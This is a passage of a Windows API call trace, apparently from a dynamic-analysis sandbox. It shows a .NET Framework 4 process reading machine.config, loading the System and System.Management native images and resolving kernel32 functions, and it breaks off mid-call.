dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x25c [0079.800] GetLastError () returned 0x0 [0079.800] SysReAllocStringLen (in: pbstr=0x6eae34*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x6eae34*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0079.800] GetThreadLocale () returned 0x409 [0079.800] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0079.800] GetThreadLocale () returned 0x409 [0079.800] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0079.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x104, lpBuffer=0x6eabb8, lpFilePart=0x6eabb4 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x6eabb4*="machine.config") returned 0x43 [0079.800] SysReAllocStringLen (in: pbstr=0x6eae34*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x6eae34*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0079.800] SysReAllocStringLen (in: pbstr=0x6eade4*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x6eade4*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0079.800] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchLength=0x43 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 0x43 [0079.800] SysReAllocStringLen (in: pbstr=0x6eae34*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x6eae34*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 1 [0079.800] SetLastError (dwErrCode=0x0) [0079.801] GetCurrentThreadId () returned 0xb0c [0079.801] GetCurrentThreadId () returned 0xb0c [0079.801] GetCurrentThreadId () returned 0xb0c [0079.801] GetCurrentThreadId () returned 0xb0c [0079.801] GetCurrentThreadId () returned 0xb0c [0079.801] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0079.801] GetCurrentThreadId () returned 0xb0c [0079.801] GetCurrentThreadId () returned 0xb0c [0079.801] GetCurrentThreadId () returned 0xb0c [0079.801] SetEvent (hEvent=0xbc) returned 1 [0079.801] ReadFile (in: hFile=0x25c, lpBuffer=0xb5bfc0, nNumberOfBytesToRead=0xfff, lpNumberOfBytesRead=0x6ead98, lpOverlapped=0x0 | out: lpBuffer=0xb5bfc0*, lpNumberOfBytesRead=0x6ead98*=0xfff, lpOverlapped=0x0) returned 1 [0079.804] GetCurrentThreadId () returned 0xb0c [0079.804] GetCurrentThreadId () returned 0xb0c [0079.804] GetCurrentThreadId () returned 0xb0c [0079.804] GetCurrentThreadId () returned 0xb0c [0079.804] GetCurrentThreadId () returned 0xb0c [0079.804] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0079.804] GetCurrentThreadId () returned 0xb0c [0079.804] GetCurrentThreadId () returned 0xb0c [0079.804] GetCurrentThreadId () returned 0xb0c [0079.804] SetEvent (hEvent=0xbc) returned 1 [0079.804] ReadFile (in: hFile=0x25c, lpBuffer=0xb59fb8, nNumberOfBytesToRead=0x17f7, lpNumberOfBytesRead=0x6ead80, lpOverlapped=0x0 | out: lpBuffer=0xb59fb8*, lpNumberOfBytesRead=0x6ead80*=0x17f7, lpOverlapped=0x0) returned 1 [0079.806] GetCurrentThreadId () returned 0xb0c [0079.806] GetCurrentThreadId () returned 0xb0c [0079.806] GetCurrentThreadId () returned 0xb0c [0079.806] GetCurrentThreadId () returned 0xb0c [0079.806] GetCurrentThreadId () returned 0xb0c [0079.806] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0079.806] GetCurrentThreadId () returned 0xb0c [0079.806] GetCurrentThreadId () returned 0xb0c [0079.806] GetCurrentThreadId () returned 0xb0c [0079.806] SetEvent (hEvent=0xbc) returned 1 [0079.807] ReadFile (in: hFile=0x25c, lpBuffer=0xb59fb8, nNumberOfBytesToRead=0x1001, lpNumberOfBytesRead=0x6ead90, lpOverlapped=0x0 | out: lpBuffer=0xb59fb8*, lpNumberOfBytesRead=0x6ead90*=0x1001, lpOverlapped=0x0) returned 1 [0079.808] GetCurrentThreadId () returned 0xb0c [0079.808] GetCurrentThreadId () returned 0xb0c [0079.808] GetCurrentThreadId () returned 0xb0c [0079.808] GetCurrentThreadId () returned 0xb0c [0079.808] GetCurrentThreadId () returned 0xb0c [0079.808] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0079.808] GetCurrentThreadId () returned 0xb0c [0079.808] GetCurrentThreadId () returned 0xb0c [0079.808] GetCurrentThreadId () returned 0xb0c [0079.808] SetEvent (hEvent=0xbc) returned 1 [0079.808] ReadFile (in: hFile=0x25c, lpBuffer=0xb59fb8, nNumberOfBytesToRead=0x1002, lpNumberOfBytesRead=0x6ead90, lpOverlapped=0x0 | out: lpBuffer=0xb59fb8*, lpNumberOfBytesRead=0x6ead90*=0x1002, lpOverlapped=0x0) returned 1 [0079.810] GetCurrentThreadId () returned 0xb0c [0079.810] GetCurrentThreadId () returned 0xb0c [0079.810] GetCurrentThreadId () returned 0xb0c [0079.810] GetCurrentThreadId () returned 0xb0c [0079.810] GetCurrentThreadId () returned 0xb0c [0079.810] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0079.810] GetCurrentThreadId () returned 0xb0c [0079.810] GetCurrentThreadId () returned 0xb0c [0079.810] GetCurrentThreadId () returned 0xb0c [0079.810] SetEvent (hEvent=0xbc) returned 1 [0079.810] ReadFile (in: hFile=0x25c, lpBuffer=0xb60fd0, nNumberOfBytesToRead=0x1f28, lpNumberOfBytesRead=0x6ead84, lpOverlapped=0x0 | out: lpBuffer=0xb60fd0*, lpNumberOfBytesRead=0x6ead84*=0x1f28, lpOverlapped=0x0) returned 1 [0079.813] GetCurrentThreadId () returned 0xb0c [0079.813] ResetEvent (hEvent=0xb8) returned 1 [0079.813] GetCurrentThreadId () returned 0xb0c [0079.813] GetCurrentThreadId () returned 0xb0c [0079.813] GetCurrentThreadId () returned 0xb0c [0079.813] GetCurrentThreadId () returned 0xb0c [0079.813] ResetEvent (hEvent=0xb8) returned 1 [0079.813] GetCurrentThreadId () returned 0xb0c [0079.813] GetCurrentThreadId () returned 0xb0c [0079.813] SetEvent (hEvent=0xbc) returned 1 [0079.813] SetEvent (hEvent=0xb8) returned 1 [0079.813] CloseHandle (hObject=0x25c) returned 1 [0079.820] GetCurrentThreadId () returned 0xb0c [0079.820] ResetEvent (hEvent=0xb8) returned 1 [0079.820] GetCurrentThreadId () returned 0xb0c [0079.820] GetCurrentThreadId () returned 0xb0c [0079.820] GetCurrentThreadId () returned 0xb0c [0079.820] GetCurrentThreadId () returned 0xb0c [0079.821] ResetEvent (hEvent=0xb8) returned 1 [0079.821] GetCurrentThreadId () returned 0xb0c [0079.821] GetCurrentThreadId () returned 0xb0c [0079.821] SetEvent (hEvent=0xbc) returned 1 [0079.821] SetEvent (hEvent=0xb8) returned 1 [0079.821] CloseHandle (hObject=0x25c) returned 1 [0080.067] SysReAllocStringLen (in: pbstr=0x6e9e6c*=0x0, psz="mscorrc.dll", len=0xb | out: pbstr=0x6e9e6c*="mscorrc.dll") returned 1 [0080.067] CharLowerBuffW (in: lpsz="mscorrc.dll", cchLength=0xb | out: lpsz="mscorrc.dll") returned 0xb [0080.068] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\en-US\\mscorrc.dll", hFile=0x0, dwFlags=0x2) returned 0x0 [0080.071] GetLastError () returned 0x2 [0080.071] SetLastError (dwErrCode=0x2) [0080.071] SysReAllocStringLen (in: pbstr=0x6e9e6c*=0x0, psz="mscorrc.dll", len=0xb | out: pbstr=0x6e9e6c*="mscorrc.dll") returned 1 [0080.071] CharLowerBuffW (in: lpsz="mscorrc.dll", cchLength=0xb | out: lpsz="mscorrc.dll") returned 0xb [0080.071] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\en\\mscorrc.dll", hFile=0x0, dwFlags=0x2) returned 0x0 [0080.071] GetLastError () returned 0x2 [0080.071] SetLastError (dwErrCode=0x2) [0080.072] SysReAllocStringLen (in: pbstr=0x6e9e6c*=0x0, psz="mscorrc.dll", len=0xb | out: pbstr=0x6e9e6c*="mscorrc.dll") returned 1 [0080.072] CharLowerBuffW (in: lpsz="mscorrc.dll", cchLength=0xb | out: lpsz="mscorrc.dll") returned 0xb [0080.072] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll", hFile=0x0, dwFlags=0x2) returned 0x2180001 [0080.076] GetLastError () returned 0x0 [0080.094] SysReAllocStringLen (in: pbstr=0x6ed094*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x6ed094*="kernel32") returned 1 [0080.094] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0080.094] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0080.096] GetProcAddress (hModule=0x76d30000, lpProcName="ResolveLocaleName") returned 0x76dc4831 [0080.142] SysReAllocStringLen (in: pbstr=0x6e9f98*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6e9f98*="kernel32.dll") returned 1 [0080.142] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0080.142] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0080.145] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0080.160] CreateFileW (lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\4a1bd5a11e89160fb5f7669f6e27e129\\system.management.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x25c [0080.160] GetLastError () returned 0x0 [0080.160] SysReAllocStringLen (in: pbstr=0x6e9b00*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", len=0x7e | out: pbstr=0x6e9b00*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux") returned 1 [0080.160] GetThreadLocale () returned 0x409 [0080.161] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0080.161] GetThreadLocale () returned 0x409 [0080.161] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0080.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x6e9884, lpFilePart=0x6e9880 | out: lpBuffer="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", lpFilePart=0x6e9880*="System.Management.ni.dll.aux") returned 0x7e [0080.161] SysReAllocStringLen (in: pbstr=0x6e9b00*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", len=0x7e | out: pbstr=0x6e9b00*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux") returned 1 [0080.161] SysReAllocStringLen (in: pbstr=0x6e9ab0*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", len=0x7e | out: pbstr=0x6e9ab0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux") returned 1 [0080.161] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", cchLength=0x7e | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\4a1bd5a11e89160fb5f7669f6e27e129\\system.management.ni.dll.aux") returned 0x7e [0080.161] SysReAllocStringLen (in: pbstr=0x6e9b00*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\4a1bd5a11e89160fb5f7669f6e27e129\\system.management.ni.dll.aux", len=0x7e | out: pbstr=0x6e9b00*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\4a1bd5a11e89160fb5f7669f6e27e129\\system.management.ni.dll.aux") returned 1 [0080.161] SetLastError (dwErrCode=0x0) [0080.161] GetCurrentThreadId () returned 0xb0c [0080.161] GetCurrentThreadId () returned 0xb0c [0080.161] GetCurrentThreadId () returned 0xb0c [0080.161] GetCurrentThreadId () returned 0xb0c [0080.161] GetCurrentThreadId () returned 0xb0c [0080.161] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0080.161] GetCurrentThreadId () returned 0xb0c [0080.161] GetCurrentThreadId () returned 0xb0c [0080.162] GetCurrentThreadId () returned 0xb0c [0080.162] SetEvent (hEvent=0xbc) returned 1 [0080.162] GetFileSize (in: hFile=0x25c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2fc [0080.162] GetCurrentThreadId () returned 0xb0c [0080.162] GetCurrentThreadId () returned 0xb0c [0080.162] GetCurrentThreadId () returned 0xb0c [0080.162] GetCurrentThreadId () returned 0xb0c [0080.162] GetCurrentThreadId () returned 0xb0c [0080.162] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0080.162] GetCurrentThreadId () returned 0xb0c [0080.162] GetCurrentThreadId () returned 0xb0c [0080.162] GetCurrentThreadId () returned 0xb0c [0080.162] SetEvent (hEvent=0xbc) returned 1 [0080.162] ReadFile (in: hFile=0x25c, lpBuffer=0xb61b90, nNumberOfBytesToRead=0x2fc, lpNumberOfBytesRead=0x6e9bb4, lpOverlapped=0x0 | out: lpBuffer=0xb61b90*, lpNumberOfBytesRead=0x6e9bb4*=0x2fc, lpOverlapped=0x0) returned 1 [0080.164] GetCurrentThreadId () returned 0xb0c [0080.164] ResetEvent (hEvent=0xb8) returned 1 [0080.164] GetCurrentThreadId () returned 0xb0c [0080.164] GetCurrentThreadId () returned 0xb0c [0080.164] GetCurrentThreadId () returned 0xb0c [0080.164] GetCurrentThreadId () returned 0xb0c [0080.164] ResetEvent (hEvent=0xb8) returned 1 [0080.165] GetCurrentThreadId () returned 0xb0c [0080.165] GetCurrentThreadId () returned 0xb0c [0080.165] SetEvent (hEvent=0xbc) returned 1 [0080.165] SetEvent (hEvent=0xb8) returned 1 [0080.165] CloseHandle (hObject=0x25c) returned 1 [0080.188] SysReAllocStringLen (in: pbstr=0x6e89c8*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6e89c8*="kernel32.dll") returned 1 [0080.188] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0080.188] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0080.191] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0080.192] GetCurrentThreadId () returned 0xb0c [0080.192] ResetEvent (hEvent=0xb8) returned 1 [0080.193] GetCurrentThreadId () returned 0xb0c [0080.193] GetCurrentThreadId () returned 0xb0c [0080.193] GetCurrentThreadId () returned 0xb0c [0080.193] GetCurrentThreadId () returned 0xb0c [0080.193] ResetEvent (hEvent=0xb8) returned 1 [0080.193] GetCurrentThreadId () returned 0xb0c [0080.193] GetCurrentThreadId () returned 0xb0c [0080.193] SetEvent (hEvent=0xbc) returned 1 [0080.193] SetEvent (hEvent=0xb8) returned 1 [0080.193] CloseHandle (hObject=0x25c) returned 1 [0080.200] CreateFileW (lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\500ffa28b327e171fe664023003e947e\\system.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0080.201] GetLastError () returned 0x0 [0080.201] SysReAllocStringLen (in: pbstr=0x6e91c0*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", len=0x68 | out: pbstr=0x6e91c0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux") returned 1 [0080.201] GetThreadLocale () returned 0x409 [0080.201] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0080.201] GetThreadLocale () returned 0x409 [0080.201] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0080.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x6e8f44, lpFilePart=0x6e8f40 | out: lpBuffer="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", lpFilePart=0x6e8f40*="System.ni.dll.aux") returned 0x68 [0080.202] SysReAllocStringLen (in: pbstr=0x6e91c0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", len=0x68 | out: pbstr=0x6e91c0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux") returned 1 [0080.202] SysReAllocStringLen (in: pbstr=0x6e9170*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", len=0x68 | out: pbstr=0x6e9170*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux") returned 1 [0080.202] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", cchLength=0x68 | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\500ffa28b327e171fe664023003e947e\\system.ni.dll.aux") returned 0x68 [0080.202] SysReAllocStringLen (in: pbstr=0x6e91c0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\500ffa28b327e171fe664023003e947e\\system.ni.dll.aux", len=0x68 | out: pbstr=0x6e91c0*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\500ffa28b327e171fe664023003e947e\\system.ni.dll.aux") returned 1 [0080.202] SetLastError (dwErrCode=0x0) [0080.202] GetCurrentThreadId () returned 0xb0c [0080.202] GetCurrentThreadId () returned 0xb0c [0080.202] GetCurrentThreadId () returned 0xb0c [0080.202] GetCurrentThreadId () returned 0xb0c [0080.202] GetCurrentThreadId () returned 0xb0c [0080.202] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0080.202] GetCurrentThreadId () returned 0xb0c [0080.202] GetCurrentThreadId () returned 0xb0c [0080.202] GetCurrentThreadId () returned 0xb0c [0080.202] SetEvent (hEvent=0xbc) returned 1 [0080.202] GetFileSize (in: hFile=0x264, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x26c [0080.202] GetCurrentThreadId () returned 0xb0c [0080.202] GetCurrentThreadId () returned 0xb0c [0080.203] GetCurrentThreadId () returned 0xb0c [0080.203] GetCurrentThreadId () returned 0xb0c [0080.203] GetCurrentThreadId () returned 0xb0c [0080.203] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0080.203] GetCurrentThreadId () returned 0xb0c [0080.203] GetCurrentThreadId () returned 0xb0c [0080.203] GetCurrentThreadId () returned 0xb0c [0080.203] SetEvent (hEvent=0xbc) returned 1 [0080.203] ReadFile (in: hFile=0x264, lpBuffer=0xb63990, nNumberOfBytesToRead=0x26c, lpNumberOfBytesRead=0x6e9274, lpOverlapped=0x0 | out: lpBuffer=0xb63990*, lpNumberOfBytesRead=0x6e9274*=0x26c, lpOverlapped=0x0) returned 1 [0080.205] GetCurrentThreadId () returned 0xb0c [0080.205] ResetEvent (hEvent=0xb8) returned 1 [0080.205] GetCurrentThreadId () returned 0xb0c [0080.205] GetCurrentThreadId () returned 0xb0c [0080.205] GetCurrentThreadId () returned 0xb0c [0080.205] GetCurrentThreadId () returned 0xb0c [0080.205] ResetEvent (hEvent=0xb8) returned 1 [0080.205] GetCurrentThreadId () returned 0xb0c [0080.206] GetCurrentThreadId () returned 0xb0c [0080.206] SetEvent (hEvent=0xbc) returned 1 [0080.206] SetEvent (hEvent=0xb8) returned 1 [0080.206] CloseHandle (hObject=0x264) returned 1 [0080.222] SysReAllocStringLen (in: pbstr=0x6e8070*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6e8070*="kernel32.dll") returned 1 [0080.222] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0080.222] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0080.225] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0080.226] GetCurrentThreadId () returned 0xb0c [0080.226] ResetEvent (hEvent=0xb8) returned 1 [0080.226] GetCurrentThreadId () returned 0xb0c [0080.226] GetCurrentThreadId () returned 0xb0c [0080.226] GetCurrentThreadId () returned 0xb0c [0080.226] GetCurrentThreadId () returned 0xb0c [0080.226] ResetEvent (hEvent=0xb8) returned 1 [0080.226] GetCurrentThreadId () returned 0xb0c [0080.226] GetCurrentThreadId () returned 0xb0c [0080.226] SetEvent (hEvent=0xbc) returned 1 [0080.226] SetEvent (hEvent=0xb8) returned 1 [0080.226] CloseHandle (hObject=0x264) returned 1 [0080.237] SysReAllocStringLen (in: pbstr=0x6e8070*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6e8070*="kernel32.dll") returned 1 [0080.238] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0080.238] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0080.240] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0080.242] GetCurrentThreadId () returned 0xb0c [0080.242] ResetEvent (hEvent=0xb8) returned 1 [0080.242] GetCurrentThreadId () returned 0xb0c [0080.242] GetCurrentThreadId () returned 0xb0c [0080.242] GetCurrentThreadId () returned 0xb0c [0080.242] GetCurrentThreadId () returned 0xb0c [0080.242] ResetEvent (hEvent=0xb8) returned 1 [0080.242] GetCurrentThreadId () returned 0xb0c [0080.242] GetCurrentThreadId () returned 0xb0c [0080.242] SetEvent (hEvent=0xbc) returned 1 [0080.242] SetEvent (hEvent=0xb8) returned 1 [0080.242] CloseHandle (hObject=0x264) returned 1 [0080.244] SysReAllocStringLen (in: pbstr=0x6e8778*=0x0, psz="System.ni.dll", len=0xd | out: pbstr=0x6e8778*="System.ni.dll") returned 1 [0080.244] CharLowerBuffW (in: lpsz="System.ni.dll", cchLength=0xd | out: lpsz="system.ni.dll") returned 0xd [0080.244] LoadLibraryExW (lpLibFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x725b0000 [0080.408] GetLastError () returned 0x0 [0080.432] SysReAllocStringLen (in: pbstr=0x6e89b0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6e89b0*="kernel32.dll") returned 1 [0080.432] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0080.433] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0080.436] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0080.436] GetCurrentThreadId () returned 0xb0c [0080.436] ResetEvent (hEvent=0xb8) returned 1 [0080.436] GetCurrentThreadId () returned 0xb0c [0080.436] GetCurrentThreadId () returned 0xb0c [0080.436] GetCurrentThreadId () returned 0xb0c [0080.436] GetCurrentThreadId () returned 0xb0c [0080.437] ResetEvent (hEvent=0xb8) returned 1 [0080.437] GetCurrentThreadId () returned 0xb0c [0080.437] GetCurrentThreadId () returned 0xb0c [0080.437] SetEvent (hEvent=0xbc) returned 1 [0080.437] SetEvent (hEvent=0xb8) returned 1 [0080.437] CloseHandle (hObject=0x25c) returned 1 [0080.451] SysReAllocStringLen (in: pbstr=0x6e89b0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6e89b0*="kernel32.dll") returned 1 [0080.451] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0080.452] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0080.454] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0080.455] GetCurrentThreadId () returned 0xb0c [0080.456] ResetEvent (hEvent=0xb8) returned 1 [0080.456] GetCurrentThreadId () returned 0xb0c [0080.456] GetCurrentThreadId () returned 0xb0c [0080.456] GetCurrentThreadId () returned 0xb0c [0080.456] GetCurrentThreadId () returned 0xb0c [0080.456] ResetEvent (hEvent=0xb8) returned 1 [0080.456] GetCurrentThreadId () returned 0xb0c [0080.456] GetCurrentThreadId () returned 0xb0c [0080.456] SetEvent (hEvent=0xbc) returned 1 [0080.456] SetEvent (hEvent=0xb8) returned 1 [0080.456] CloseHandle (hObject=0x25c) returned 1 [0080.458] SysReAllocStringLen (in: pbstr=0x6e90b8*=0x0, psz="System.Management.ni.dll", len=0x18 | out: pbstr=0x6e90b8*="System.Management.ni.dll") returned 1 [0080.458] CharLowerBuffW (in: lpsz="System.Management.ni.dll", cchLength=0x18 | out: lpsz="system.management.ni.dll") returned 0x18 [0080.458] LoadLibraryExW (lpLibFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x75250000 [0080.482] GetLastError () returned 0x0 [0080.567] SysReAllocStringLen (in: pbstr=0x6ec93c*=0x0, psz="shell32.dll", len=0xb | out: 